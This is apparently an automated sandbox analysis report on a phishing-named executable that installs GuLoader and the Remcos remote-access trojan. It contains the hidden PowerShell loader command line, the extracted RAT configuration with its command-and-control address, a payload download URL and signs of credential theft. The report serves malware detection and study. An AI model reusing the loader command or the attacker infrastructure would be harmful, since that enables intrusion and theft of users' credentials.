Windows Analysis Report
RFQ 008191.exe

Overview

General Information

Sample name:RFQ 008191.exe
Analysis ID:1572498
MD5:82ba32e4800897e8bafb32990d29f60a
SHA1:21b724df29b7ddbcd88849e7ad6ab12a4d266c4c
SHA256:777441225b9d294baca2f689286a1f70a0fc28007e86cf1cc099c71ee1d826f2
Tags:exeuser-lowmal3

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Detected unpacking (changes PE section rights)
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • RFQ 008191.exe (PID: 820 cmdline: "C:\Users\user\Desktop\RFQ 008191.exe" MD5: 82BA32E4800897E8BAFB32990D29F60A)
    • powershell.exe (PID: 1264 cmdline: powershell.exe -windowstyle hidden "$Prmierer=gc -raw 'C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Beruse.Rob';$eftersgningers=$Prmierer.SubString(48853,3);.$eftersgningers($Prmierer) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Juryen.exe (PID: 7864 cmdline: "C:\Users\user~1\AppData\Local\Temp\Juryen.exe" MD5: 82BA32E4800897E8BAFB32990D29F60A)
        • Juryen.exe (PID: 8032 cmdline: C:\Users\user~1\AppData\Local\Temp\Juryen.exe /stext "C:\Users\user\AppData\Local\Temp\dcokdpgzihxxnj" MD5: 82BA32E4800897E8BAFB32990D29F60A)
        • Juryen.exe (PID: 8040 cmdline: C:\Users\user~1\AppData\Local\Temp\Juryen.exe /stext "C:\Users\user\AppData\Local\Temp\owccehyavpqcxpshx" MD5: 82BA32E4800897E8BAFB32990D29F60A)
        • Juryen.exe (PID: 8056 cmdline: C:\Users\user~1\AppData\Local\Temp\Juryen.exe /stext "C:\Users\user\AppData\Local\Temp\yyhnfajurxihaeglgsaa" MD5: 82BA32E4800897E8BAFB32990D29F60A)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["212.162.149.91:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-HSAM04", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000B.00000002.2512739628.000000000019F000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000B.00000002.2528307519.0000000002EAE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000B.00000002.2528307519.0000000002E96000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000006.00000002.1771671696.0000000009BD8000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
Process Memory Space: Juryen.exe PID: 7864 | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security

              System Summary

              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe -windowstyle hidden "$Prmierer=gc -raw 'C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Beruse.Rob';$eftersgningers=$Prmierer.SubString(48853,3);.$eftersgningers($Prmierer), CommandLine: powershell.exe -windowstyle hidden "$Prmierer=gc -raw 'C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Beruse.Rob';$eftersgningers=$Prmierer.SubString(48853,3);.$eftersgningers($Prmierer), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ 008191.exe", ParentImage: C:\Users\user\Desktop\RFQ 008191.exe, ParentProcessId: 820, ParentProcessName: RFQ 008191.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Prmierer=gc -raw 'C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Beruse.Rob';$eftersgningers=$Prmierer.SubString(48853,3);.$eftersgningers($Prmierer), ProcessId: 1264, ProcessName: powershell.exe
              Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: powershell.exe -windowstyle hidden "$Prmierer=gc -raw 'C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Beruse.Rob';$eftersgningers=$Prmierer.SubString(48853,3);.$eftersgningers($Prmierer), CommandLine: powershell.exe -windowstyle hidden "$Prmierer=gc -raw 'C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Beruse.Rob';$eftersgningers=$Prmierer.SubString(48853,3);.$eftersgningers($Prmierer), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ 008191.exe", ParentImage: C:\Users\user\Desktop\RFQ 008191.exe, ParentProcessId: 820, ParentProcessName: RFQ 008191.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Prmierer=gc -raw 'C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Beruse.Rob';$eftersgningers=$Prmierer.SubString(48853,3);.$eftersgningers($Prmierer), ProcessId: 1264, ProcessName: powershell.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Prmierer=gc -raw 'C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Beruse.Rob';$eftersgningers=$Prmierer.SubString(48853,3);.$eftersgningers($Prmierer), CommandLine: powershell.exe -windowstyle hidden "$Prmierer=gc -raw 'C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Beruse.Rob';$eftersgningers=$Prmierer.SubString(48853,3);.$eftersgningers($Prmierer), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ 008191.exe", ParentImage: C:\Users\user\Desktop\RFQ 008191.exe, ParentProcessId: 820, ParentProcessName: RFQ 008191.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Prmierer=gc -raw 'C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Beruse.Rob';$eftersgningers=$Prmierer.SubString(48853,3);.$eftersgningers($Prmierer), ProcessId: 1264, ProcessName: powershell.exe

              Stealing of Sensitive Information

              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Juryen.exe, ProcessId: 7864, TargetFilename: C:\ProgramData\remcos\logs.dat
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-10T16:29:02.256338+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49793 | 212.162.149.91 | 2404 | TCP
2024-12-10T16:29:04.459493+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49799 | 212.162.149.91 | 2404 | TCP
2024-12-10T16:29:04.654488+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.7 | 49801 | 178.237.33.50 | 80 | TCP
2024-12-10T16:28:58.760234+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49784 | 212.162.149.89 | 80 | TCP


              AV Detection

              Source: 0000000B.00000002.2528307519.0000000002E96000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["212.162.149.91:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-HSAM04", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeReversingLabs: Detection: 18%
              Source: RFQ 008191.exeReversingLabs: Detection: 18%
              Source: Yara matchFile source: 0000000B.00000002.2512739628.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2528307519.0000000002EAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2528307519.0000000002E96000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Juryen.exe PID: 7864, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeJoe Sandbox ML: detected
              Source: RFQ 008191.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,13_2_00404423
              Source: RFQ 008191.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: RFQ 008191.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000006.00000002.1770161341.000000000824C000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\RFQ 008191.exeCode function: 0_2_0040689E FindFirstFileW,FindClose,0_2_0040689E
              Source: C:\Users\user\Desktop\RFQ 008191.exeCode function: 0_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C4D
              Source: C:\Users\user\Desktop\RFQ 008191.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 11_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,11_2_00405C4D
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 11_2_00402930 FindFirstFileW,11_2_00402930
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 11_2_0040689E FindFirstFileW,FindClose,11_2_0040689E
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 11_2_1F7510F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,11_2_1F7510F1
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 11_2_1F756580 FindFirstFileExA,11_2_1F756580
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407EF8
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407898

              Networking

              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49793 -> 212.162.149.91:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49799 -> 212.162.149.91:2404
              Source: Malware configuration extractorIPs: 212.162.149.91
              Source: global trafficTCP traffic: 192.168.2.7:49793 -> 212.162.149.91:2404
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: UNREAL-SERVERSUS UNREAL-SERVERSUS
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49784 -> 212.162.149.89:80
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49801 -> 178.237.33.50:80
              Source: global trafficHTTP traffic detected: GET /wwVHOGRH148.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.89Cache-Control: no-cache
Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.89 (50 identical entries)
              Source: global trafficHTTP traffic detected: GET /wwVHOGRH148.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.89Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Juryen.exe, 0000000D.00000003.1904920514.0000000000979000.00000004.00000020.00020000.00000000.sdmp, Juryen.exe, 0000000D.00000002.1906158159.0000000000979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: Juryen.exe, 0000000D.00000003.1904920514.0000000000979000.00000004.00000020.00020000.00000000.sdmp, Juryen.exe, 0000000D.00000002.1906158159.0000000000979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: Juryen.exe, 0000000B.00000002.2542705888.000000001F720000.00000040.10000000.00040000.00000000.sdmp, Juryen.exe, 0000000F.00000002.1880775989.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: Juryen.exe, Juryen.exe, 0000000F.00000002.1880775989.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: Juryen.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: Juryen.exe, 0000000B.00000002.2542497017.000000001F630000.00000040.10000000.00040000.00000000.sdmp, Juryen.exe, 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: Juryen.exe, 0000000B.00000002.2542497017.000000001F630000.00000040.10000000.00040000.00000000.sdmp, Juryen.exe, 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: Juryen.exe, 0000000B.00000002.2528621890.0000000004940000.00000004.00001000.00020000.00000000.sdmp, Juryen.exe, 0000000B.00000002.2528307519.0000000002E58000.00000004.00000020.00020000.00000000.sdmp, Juryen.exe, 0000000B.00000002.2528307519.0000000002E96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.89/wwVHOGRH148.bin
              Source: Juryen.exe, 0000000B.00000002.2528307519.0000000002E96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.89/wwVHOGRH148.bins
              Source: bhvA440.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhvA440.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
              Source: bhvA440.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhvA440.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhvA440.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: Juryen.exe, 0000000B.00000002.2528307519.0000000002E96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: Juryen.exe, 0000000B.00000002.2528307519.0000000002EAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp&
              Source: Juryen.exe, 0000000B.00000002.2528307519.0000000002E96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gphy
              Source: Juryen.exe, 0000000B.00000002.2528307519.0000000002E96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpq
              Source: RFQ 008191.exe, Juryen.exe.6.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: powershell.exe, 00000006.00000002.1766181326.0000000005C2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: bhvA440.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0
              Source: powershell.exe, 00000006.00000002.1762545128.0000000004D16000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000006.00000002.1762545128.0000000004D16000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 00000006.00000002.1762545128.0000000004BC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000006.00000002.1762545128.0000000004D16000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: powershell.exe, 00000006.00000002.1762545128.0000000004D16000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: Juryen.exe, Juryen.exe, 0000000F.00000002.1880775989.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com
              Source: Juryen.exe, 0000000F.00000003.1880468582.000000000079D000.00000004.00000020.00020000.00000000.sdmp, Juryen.exe, 0000000F.00000003.1880426183.000000000079D000.00000004.00000020.00020000.00000000.sdmp, Juryen.exe, 0000000F.00000002.1880775989.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.com
              Source: Juryen.exe, 0000000B.00000002.2542705888.000000001F720000.00000040.10000000.00040000.00000000.sdmp, Juryen.exe, 0000000F.00000002.1880775989.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: Juryen.exe, 0000000F.00000003.1880468582.000000000079D000.00000004.00000020.00020000.00000000.sdmp, Juryen.exe, 0000000F.00000003.1880426183.000000000079D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.imvu.comppData
              Source: Juryen.exe, 0000000B.00000002.2542705888.000000001F720000.00000040.10000000.00040000.00000000.sdmp, Juryen.exe, 0000000F.00000002.1880775989.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comr
              Source: Juryen.exe, 0000000D.00000002.1905221052.0000000000193000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://www.nirsoft.net
              Source: Juryen.exe, 0000000F.00000002.1880775989.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.nirsoft.net/
              Source: powershell.exe, 00000006.00000002.1762545128.0000000004BC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000006.00000002.1762545128.0000000004D16000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
              Source: powershell.exe, 00000006.00000002.1766181326.0000000005C2C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000006.00000002.1766181326.0000000005C2C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000006.00000002.1766181326.0000000005C2C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000006.00000002.1762545128.0000000004D16000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
              Source: Juryen.exe, 0000000D.00000002.1905796304.0000000000644000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: Juryen.exe, 0000000D.00000002.1905796304.0000000000644000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: Juryen.exe, 0000000D.00000003.1904920514.0000000000979000.00000004.00000020.00020000.00000000.sdmp, Juryen.exe, 0000000D.00000002.1906158159.0000000000979000.00000004.00000020.00020000.00000000.sdmp, Juryen.exe, 0000000D.00000002.1905796304.0000000000644000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: Juryen.exe | String found in binary or memory: https://login.yahoo.com/config/login
              Source: powershell.exe, 00000006.00000002.1766181326.0000000005C2C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
              Source: Juryen.exe, Juryen.exe, 0000000F.00000002.1880775989.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.google.com
              Source: Juryen.exe | String found in binary or memory: https://www.google.com/accounts/servicelogin

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Windows user hook set: 0 keyboard low level C:\Users\user~1\AppData\Local\Temp\Juryen.exe
              Source: C:\Users\user\Desktop\RFQ 008191.exe | Code function: 0_2_00405705 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 13_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 13_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 14_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
